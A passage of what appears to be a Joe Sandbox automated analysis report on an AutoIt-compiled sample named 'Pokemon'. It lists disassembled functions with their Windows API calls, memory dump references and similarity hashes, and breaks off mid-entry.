                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                                                                                                                                                                                      • String ID: 0.0.0.0
                                                                                                                                                                                                                                                                                      • API String ID: 642191829-3771769585
                                                                                                                                                                                                                                                                                      • Opcode ID: 2ca486353968ec5a76c3fee476f98f75bdacc25f5010710bf28f92cb29e156b6
                                                                                                                                                                                                                                                                                      • Instruction ID: 43a87e602745a4323093a1444f6746dd7506b681b022b15823455ab80c2a141a
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2ca486353968ec5a76c3fee476f98f75bdacc25f5010710bf28f92cb29e156b6
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8D11D631908219BFDB747774EC4AEEE77ACEF01714F1000B5F605A64A2EF749A869690
                                                                                                                                                                                                                                                                                      Function 000FF630 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _wcslen$LocalTime
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 952045576-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 02e9f51e6c5789ad1ddbf894441e6f75039c670a7cc92b6cdd192a11c0f9b156
                                                                                                                                                                                                                                                                                      • Instruction ID: af0ca3da22d88d9faed66a7d08e95ff9cd60f1620967049b9b12a983ffa2dec8
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 02e9f51e6c5789ad1ddbf894441e6f75039c670a7cc92b6cdd192a11c0f9b156
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F5418365C11219B5CB51FBB8CC8AAEFF7A8AF05710F508472E618E3122FB34D255C3A6
                                                                                                                                                                                                                                                                                      Function 000AFBC6 Relevance: 12.1, APIs: 8, Instructions: 124COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,000D39E2,00000004,00000000,00000000), ref: 000AFC41
                                                                                                                                                                                                                                                                                      • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,000D39E2,00000004,00000000,00000000), ref: 000EFC15
                                                                                                                                                                                                                                                                                      • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,000D39E2,00000004,00000000,00000000), ref: 000EFC98
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ShowWindow
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1268545403-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 17e2f55d965a32f3e57c139e4103d5230a3a3576adb5aa17ca6a21b18f05c65d
                                                                                                                                                                                                                                                                                      • Instruction ID: ad0c7b67a1c93e28d37d73e52fda7fb5b51a8a5bca24e1fdb700edac38206d51
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 17e2f55d965a32f3e57c139e4103d5230a3a3576adb5aa17ca6a21b18f05c65d
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D24109306087CAAEC7789BFBDB8C77A7BD1AB47360F34453CE94656960C675A880CB11
                                                                                                                                                                                                                                                                                      Function 0012379F Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 001237B7
                                                                                                                                                                                                                                                                                      • GetDC.USER32(00000000), ref: 001237BF
                                                                                                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 001237CA
                                                                                                                                                                                                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 001237D6
                                                                                                                                                                                                                                                                                      • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00123812
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00123823
                                                                                                                                                                                                                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00126504,?,?,000000FF,00000000,?,000000FF,?), ref: 0012385E
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 0012387D
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3864802216-0
                                                                                                                                                                                                                                                                                      • Opcode ID: c705613e712f164d79a1a65fc5a24b87258ba346476f16fab74b97f97a22b758
                                                                                                                                                                                                                                                                                      • Instruction ID: 33bb7fa40726fed15e97604096d9bb43479c40900e7c655d8c76a8016148fedc
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c705613e712f164d79a1a65fc5a24b87258ba346476f16fab74b97f97a22b758
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1A31A072201224BFEB254F50EC89FEB3BADEF49715F044065FE089A191C6B99CA1C7A4
                                                                                                                                                                                                                                                                                      Function 00115A0B Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                                                                                                                                                                                      • API String ID: 0-572801152
                                                                                                                                                                                                                                                                                      • Opcode ID: 6dd3299cca1a1f3606d6b3aa0569204062475e31aa2789877ba6e17191868118
                                                                                                                                                                                                                                                                                      • Instruction ID: 5f542cc5dda5a7311c8964513609a7044629c4c47c68d226cc40c7d66e93a710
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6dd3299cca1a1f3606d6b3aa0569204062475e31aa2789877ba6e17191868118
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 76D19071A0060ADFDF18CF98D885AEEB7B6EF88304F148479E915AB281D770DD85CB50
                                                                                                                                                                                                                                                                                      Function 000D18A2 Relevance: 10.8, APIs: 7, Instructions: 268COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,000D1B7B,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 000D194E
                                                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,000D1B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 000D19D1
                                                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,000D1B7B,?,000D1B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 000D1A64
                                                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,000D1B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 000D1A7B
                                                                                                                                                                                                                                                                                        • Part of subcall function 000C3B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,000B6A79,?,0000015D,?,?,?,?,000B85B0,000000FF,00000000,?,?), ref: 000C3BC5
                                                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,000D1B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 000D1AF7
                                                                                                                                                                                                                                                                                      • __freea.LIBCMT ref: 000D1B22
                                                                                                                                                                                                                                                                                      • __freea.LIBCMT ref: 000D1B2E
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2829977744-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 3b0e2e659fbb4462af7b45a3c4203e92803cf89470fe956e095f528b3b46adf3
                                                                                                                                                                                                                                                                                      • Instruction ID: 953b7935d68374d589cfd3b1ebaf5b2202e5f945ce8ebcb0aec93d69df070daf
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3b0e2e659fbb4462af7b45a3c4203e92803cf89470fe956e095f528b3b46adf3
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AF917072E00316BADB208EA4C8A1AEEBBE5AF09720F18455BE915E7341EF35DD458770
                                                                                                                                                                                                                                                                                      Function 00114F80 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Variant$ClearInit
                                                                                                                                                                                                                                                                                      • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                                                                                                                                                                                      • API String ID: 2610073882-625585964
                                                                                                                                                                                                                                                                                      • Opcode ID: 767f7e2eac6c4952e1f067901d2a46d386852b0301209047dc2c35b84d0b7cb9
                                                                                                                                                                                                                                                                                      • Instruction ID: 91fbc7e65a40904b0ef02bfa4f5694296f6f9f3734c88250b1b469e302a4ceaf
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 767f7e2eac6c4952e1f067901d2a46d386852b0301209047dc2c35b84d0b7cb9
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 50918E71A00615EFDF28CFA4C884FEEBBB9AF85714F108529F515AB280D7709985CFA0
                                                                                                                                                                                                                                                                                      Function 00101B46 Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00101C1B
                                                                                                                                                                                                                                                                                      • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00101C43
                                                                                                                                                                                                                                                                                      • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00101C67
                                                                                                                                                                                                                                                                                      • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00101C97
                                                                                                                                                                                                                                                                                      • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00101D1E
                                                                                                                                                                                                                                                                                      • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00101D83
                                                                                                                                                                                                                                                                                      • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00101DEF
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2550207440-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 5f382e62a00513c06a103d11cff61040d841d20e661c52c9bee1f8102fafb69c
                                                                                                                                                                                                                                                                                      • Instruction ID: 6a4339cfe467ff56a837a342ff7fc71cd7edceaa3dcfaeaeb60c169a5c7870bf
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5f382e62a00513c06a103d11cff61040d841d20e661c52c9bee1f8102fafb69c
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3091C071A00215BFEB019F98D885BFEB7B5FF04711F158429E980A72D2D7B8E941CB50
                                                                                                                                                                                                                                                                                      Function 001143A4 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 001143C8
                                                                                                                                                                                                                                                                                      • CharUpperBuffW.USER32(?,?), ref: 001144D7
                                                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 001144E7
                                                                                                                                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 0011467C
                                                                                                                                                                                                                                                                                        • Part of subcall function 0010169E: VariantInit.OLEAUT32(00000000), ref: 001016DE
                                                                                                                                                                                                                                                                                        • Part of subcall function 0010169E: VariantCopy.OLEAUT32(?,?), ref: 001016E7
                                                                                                                                                                                                                                                                                        • Part of subcall function 0010169E: VariantClear.OLEAUT32(?), ref: 001016F3
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                                                                                                                                                                                                                                                      • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                                                                                                                                                                                      • API String ID: 4137639002-1221869570
                                                                                                                                                                                                                                                                                      • Opcode ID: e61def31163ab474f9b84a48d89682ce96539edbea4bad94d5b932fcd512b98b
                                                                                                                                                                                                                                                                                      • Instruction ID: 38f1d569911b22923296c85dce1dec783b665815670644745e285dffed896053
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e61def31163ab474f9b84a48d89682ce96539edbea4bad94d5b932fcd512b98b
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CC915A756083019FCB18DF24C4819AAB7E5FF89714F14892DF8899B352DB31ED46CB82
                                                                                                                                                                                                                                                                                      Function 0011560A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F08FE: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,000F0831,80070057,?,?,?,000F0C4E), ref: 000F091B
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F08FE: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,000F0831,80070057,?,?), ref: 000F0936
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F08FE: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,000F0831,80070057,?,?), ref: 000F0944
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F08FE: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,000F0831,80070057,?), ref: 000F0954
                                                                                                                                                                                                                                                                                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 001156AE
                                                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 001157B6
                                                                                                                                                                                                                                                                                      • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0011582C
                                                                                                                                                                                                                                                                                      • CoTaskMemFree.OLE32(?), ref: 00115837
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                                                                                                                                                                                                                                                      • String ID: NULL Pointer assignment
                                                                                                                                                                                                                                                                                      • API String ID: 614568839-2785691316
                                                                                                                                                                                                                                                                                      • Opcode ID: 6329a1a5b0078b2d0505f0c35eb74b2ab31eece64fcec4ac75dee141c4f67cf7
                                                                                                                                                                                                                                                                                      • Instruction ID: 6639067cf138fdbacb22e40862d198364ca02da397f81aca234a64785e9c6bb9
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6329a1a5b0078b2d0505f0c35eb74b2ab31eece64fcec4ac75dee141c4f67cf7
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0B911671D0021DEFDF14DFA4D881AEEB7B9BF48310F104569E915A7292EB709A44DFA0
                                                                                                                                                                                                                                                                                      Function 00122B99 Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetMenu.USER32(?), ref: 00122C1F
                                                                                                                                                                                                                                                                                      • GetMenuItemCount.USER32(00000000), ref: 00122C51
                                                                                                                                                                                                                                                                                      • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00122C79
                                                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 00122CAF
                                                                                                                                                                                                                                                                                      • GetMenuItemID.USER32(?,?), ref: 00122CE9
                                                                                                                                                                                                                                                                                      • GetSubMenu.USER32(?,?), ref: 00122CF7
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F4393: GetWindowThreadProcessId.USER32(?,00000000), ref: 000F43AD
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F4393: GetCurrentThreadId.KERNEL32 ref: 000F43B4
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F4393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,000F2F00), ref: 000F43BB
                                                                                                                                                                                                                                                                                      • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00122D7F
                                                                                                                                                                                                                                                                                        • Part of subcall function 000FF292: Sleep.KERNEL32 ref: 000FF30A
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 4196846111-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 95d705af07ce79a4116fca3fa7539fa64608fe28bcbbdb007d4629f8c01e6272
                                                                                                                                                                                                                                                                                      • Instruction ID: 68fae247fa8fa086d78a0b599b5cc5255cfbb6fd05af788299da980483861ae0
